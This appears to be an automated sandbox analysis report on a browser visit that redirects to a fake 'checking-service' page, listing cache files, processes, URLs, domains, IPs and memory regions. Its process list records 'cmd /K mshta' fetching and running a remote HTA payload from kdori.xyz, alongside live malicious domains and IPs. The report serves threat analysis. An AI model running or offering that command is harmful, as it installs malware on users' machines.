Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Chrome Cache Entry: 59
|
GIF image data, version 89a, 800 x 471
|
downloaded
|
||
|
Chrome Cache Entry: 60
|
PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 61
|
GIF image data, version 89a, 800 x 471
|
dropped
|
||
|
Chrome Cache Entry: 62
|
GIF image data, version 89a, 800 x 471
|
dropped
|
||
|
Chrome Cache Entry: 63
|
GIF image data, version 89a, 501 x 456
|
downloaded
|
||
|
Chrome Cache Entry: 64
|
HTML document, ASCII text
|
downloaded
|
||
|
Chrome Cache Entry: 65
|
HTML document, ASCII text
|
downloaded
|
||
|
Chrome Cache Entry: 66
|
GIF image data, version 89a, 800 x 471
|
downloaded
|
||
|
Chrome Cache Entry: 67
|
GIF image data, version 89a, 501 x 456
|
dropped
|
||
|
Chrome Cache Entry: 68
|
HTML document, ASCII text
|
downloaded
|
||
|
Chrome Cache Entry: 69
|
GIF image data, version 89a, 800 x 471
|
downloaded
|
||
|
Chrome Cache Entry: 70
|
MS Windows icon resource - 2 icons, 16x16, 32x32
|
downloaded
|
||
|
Chrome Cache Entry: 71
|
PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 72
|
HTML document, ASCII text
|
downloaded
|
||
|
Chrome Cache Entry: 73
|
GIF image data, version 89a, 800 x 471
|
dropped
|
||
|
Chrome Cache Entry: 74
|
PNG image data, 1920 x 3068, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 75
|
GIF image data, version 89a, 8 x 8
|
downloaded
|
||
|
Chrome Cache Entry: 76
|
MS Windows icon resource - 2 icons, 16x16, 32x32
|
dropped
|
||
|
Chrome Cache Entry: 77
|
HTML document, ASCII text, with very long lines (603), with CRLF line terminators
|
downloaded
|
||
|
Chrome Cache Entry: 78
|
PNG image data, 1920 x 3068, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 79
|
GIF image data, version 89a, 8 x 8
|
dropped
|
There are 12 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
|
 |
|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2264,i,15146219156717733873,6408738554136214457,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
--variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2300 /prefetch:3
|
|
|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://lfkworld.nl/"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
cmd /K mshta http://kdori.xyz/am2v93vnqoavsdjl.hta
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\mshta.exe
|
mshta http://kdori.xyz/am2v93vnqoavsdjl.hta
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://lfkworld.nl/
|
|
||
|
https://usadockfile.live/checking-service.com-delivery.org/index.html
|
|
||
|
http://kdori.xyz/am2v93vnqoavsdjl.hta
|
unknown
|
|
|
|
https://usadockfile.live/checking-service.com-delivery.org/background2.png
|
91.92.46.231
|
||
|
https://lfkworld.nl/favicon.ico
|
185.174.40.195
|
||
|
https://usdoki.today
|
unknown
|
||
|
http://kdori.xyz/am2v93vnqoavsdjl.hta3
|
unknown
|
||
|
https://usadockfile.live/favicon.ico
|
91.92.46.231
|
||
|
https://usadockfile.live/checking-service.com-delivery.org/example_step3.gif
|
91.92.46.231
|
||
|
https://usdoki.today/
|
91.92.46.231
|
||
|
https://usadockfile.live/
|
91.92.46.231
|
||
|
https://usadockfile.live/checking-service.com-delivery.org/example_step1.gif
|
91.92.46.231
|
||
|
https://usadockfile.live/checking-service.com-delivery.org/fx.ico
|
91.92.46.231
|
||
|
http://kdori.xyz/am2v93vnqoavsdjl.hta...
|
unknown
|
||
|
https://lfkworld.nl/
|
|||
|
http://kdori.xyz/am2v93vnqoavsdjl.htaj2
|
unknown
|
||
|
https://usadockfile.live/backblue.gif
|
91.92.46.231
|
||
|
https://usadockfile.live/fade.gif
|
91.92.46.231
|
||
|
https://usadockfile.live/checking-service.com-delivery.org/example_step2.gif
|
91.92.46.231
|
||
|
http://kdori.xyz/am2v93vnqoavsdjl.htamshta
|
unknown
|
||
|
http://kdori.xyz/am2v93vnqoavsdjl.htaWinSta0
|
unknown
|
||
|
http://kdori.xyz/am2v93vnqoavsdjl.htad
|
unknown
|
There are 11 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
kdori.xyz
|
unknown
|
|
|
|
usdoki.today
|
91.92.46.231
|
||
|
www.google.com
|
142.250.68.36
|
||
|
usadockfile.live
|
91.92.46.231
|
||
|
lfkworld.nl
|
185.174.40.195
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
91.92.46.231
|
usdoki.today
|
Bulgaria
|
||
|
185.174.40.195
|
lfkworld.nl
|
Netherlands
|
||
|
192.168.2.4
|
unknown
|
unknown
|
||
|
142.250.68.36
|
www.google.com
|
United States
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
55ED000
|
stack
|
page read and write
|
||
|
4DB0000
|
heap
|
page read and write
|
||
|
535E000
|
stack
|
page read and write
|
||
|
A722000
|
trusted library allocation
|
page read and write
|
||
|
86DC000
|
stack
|
page read and write
|
||
|
2D90000
|
heap
|
page read and write
|
||
|
AC00000
|
trusted library allocation
|
page read and write
|
||
|
4DE0000
|
heap
|
page read and write
|
||
|
4F74000
|
heap
|
page read and write
|
||
|
5A70000
|
trusted library allocation
|
page read and write
|
||
|
3010000
|
trusted library allocation
|
page read and write
|
||
|
4E38000
|
trusted library allocation
|
page read and write
|
||
|
6497000
|
heap
|
page read and write
|
||
|
4E10000
|
trusted library allocation
|
page read and write
|
||
|
4E1A000
|
trusted library allocation
|
page read and write
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
545F000
|
stack
|
page read and write
|
||
|
4E4E000
|
trusted library allocation
|
page read and write
|
||
|
30A0000
|
heap
|
page read and write
|
||
|
2D2F000
|
heap
|
page read and write
|
||
|
58BB000
|
stack
|
page read and write
|
||
|
2D47000
|
heap
|
page read and write
|
||
|
2EAE000
|
stack
|
page read and write
|
||
|
2FAE000
|
stack
|
page read and write
|
||
|
86E0000
|
trusted library section
|
page readonly
|
||
|
7F7D0000
|
trusted library allocation
|
page execute read
|
||
|
4DE5000
|
heap
|
page read and write
|
||
|
2CFF000
|
heap
|
page read and write
|
||
|
64AD000
|
heap
|
page read and write
|
||
|
64C2000
|
heap
|
page read and write
|
||
|
2D95000
|
heap
|
page read and write
|
||
|
4E0E000
|
trusted library allocation
|
page read and write
|
||
|
6470000
|
heap
|
page read and write
|
||
|
4E1C000
|
trusted library allocation
|
page read and write
|
||
|
4E30000
|
trusted library allocation
|
page read and write
|
||
|
4E18000
|
trusted library allocation
|
page read and write
|
||
|
2D36000
|
heap
|
page read and write
|
||
|
4DFE000
|
trusted library allocation
|
page read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
2D4C000
|
heap
|
page read and write
|
||
|
64AB000
|
heap
|
page read and write
|
||
|
559F000
|
stack
|
page read and write
|
||
|
549E000
|
stack
|
page read and write
|
||
|
635C000
|
stack
|
page read and write
|
||
|
2CDB000
|
heap
|
page read and write
|
||
|
4E4C000
|
trusted library allocation
|
page read and write
|
||
|
2D5E000
|
heap
|
page read and write
|
||
|
4E0C000
|
trusted library allocation
|
page read and write
|
||
|
2D0C000
|
heap
|
page read and write
|
||
|
51DD000
|
stack
|
page read and write
|
||
|
28EA000
|
stack
|
page read and write
|
||
|
4E00000
|
trusted library allocation
|
page read and write
|
||
|
64B1000
|
heap
|
page read and write
|
||
|
4DFA000
|
trusted library allocation
|
page read and write
|
||
|
4C94000
|
heap
|
page read and write
|
||
|
59BC000
|
stack
|
page read and write
|
||
|
4DE3000
|
heap
|
page read and write
|
||
|
2D27000
|
heap
|
page read and write
|
||
|
2D77000
|
heap
|
page read and write
|
||
|
4C9F000
|
heap
|
page read and write
|
||
|
2D7E000
|
heap
|
page read and write
|
||
|
4E08000
|
trusted library allocation
|
page read and write
|
||
|
30A7000
|
heap
|
page read and write
|
||
|
4E28000
|
trusted library allocation
|
page read and write
|
||
|
2C88000
|
heap
|
page read and write
|
||
|
2D4F000
|
heap
|
page read and write
|
||
|
3050000
|
heap
|
page read and write
|
||
|
4C90000
|
heap
|
page read and write
|
||
|
4E5A000
|
trusted library allocation
|
page read and write
|
||
|
521C000
|
stack
|
page read and write
|
||
|
64BB000
|
heap
|
page read and write
|
||
|
4E56000
|
trusted library allocation
|
page read and write
|
||
|
4F90000
|
heap
|
page read and write
|
||
|
645F000
|
stack
|
page read and write
|
||
|
50DF000
|
stack
|
page read and write
|
||
|
7F7C1000
|
trusted library allocation
|
page execute read
|
||
|
6482000
|
heap
|
page read and write
|
||
|
2FEE000
|
stack
|
page read and write
|
||
|
4E1E000
|
trusted library allocation
|
page read and write
|
||
|
AB00000
|
heap
|
page read and write
|
||
|
2D61000
|
heap
|
page read and write
|
||
|
31AF000
|
stack
|
page read and write
|
||
|
2D45000
|
heap
|
page read and write
|
||
|
29EA000
|
stack
|
page read and write
|
||
|
2D54000
|
heap
|
page read and write
|
||
|
30AB000
|
heap
|
page read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
4DFC000
|
trusted library allocation
|
page read and write
|
||
|
3020000
|
trusted library allocation
|
page read and write
|
||
|
586F000
|
stack
|
page read and write
|
||
|
2C9E000
|
heap
|
page read and write
|
||
|
576C000
|
stack
|
page read and write
|
||
|
6460000
|
heap
|
page read and write
|
||
|
4F2E000
|
stack
|
page read and write
|
||
|
4E0A000
|
trusted library allocation
|
page read and write
|
||
|
AB00000
|
trusted library allocation
|
page read and write
|
||
|
59D0000
|
heap
|
page read and write
|
||
|
AB70000
|
heap
|
page read and write
|
||
|
2D6E000
|
heap
|
page read and write
|
||
|
2D40000
|
heap
|
page read and write
|
||
|
AC10000
|
trusted library allocation
|
page read and write
|
||
|
4F6C000
|
stack
|
page read and write
|
||
|
531E000
|
stack
|
page read and write
|
||
|
4E40000
|
trusted library allocation
|
page read and write
|
||
|
2D08000
|
heap
|
page read and write
|
||
|
4C96000
|
heap
|
page read and write
|
||
|
64BA000
|
heap
|
page read and write
|
||
|
4F70000
|
heap
|
page read and write
|
||
|
56EE000
|
stack
|
page read and write
|
||
|
4DF8000
|
trusted library allocation
|
page read and write
|
||
|
64C2000
|
heap
|
page read and write
|
||
|
85DE000
|
stack
|
page read and write
|
There are 102 hidden memdumps, click here to show them.
DOM / HTML
|
URL
|
Malicious
|
|
|---|---|---|
|
https://usadockfile.live/checking-service.com-delivery.org/index.html
|
|
|
|
https://usadockfile.live/checking-service.com-delivery.org/index.html
|
|
|
|
https://usadockfile.live/checking-service.com-delivery.org/index.html
|
|
|
|
https://usadockfile.live/checking-service.com-delivery.org/index.html
|
|
|
|
https://lfkworld.nl/
|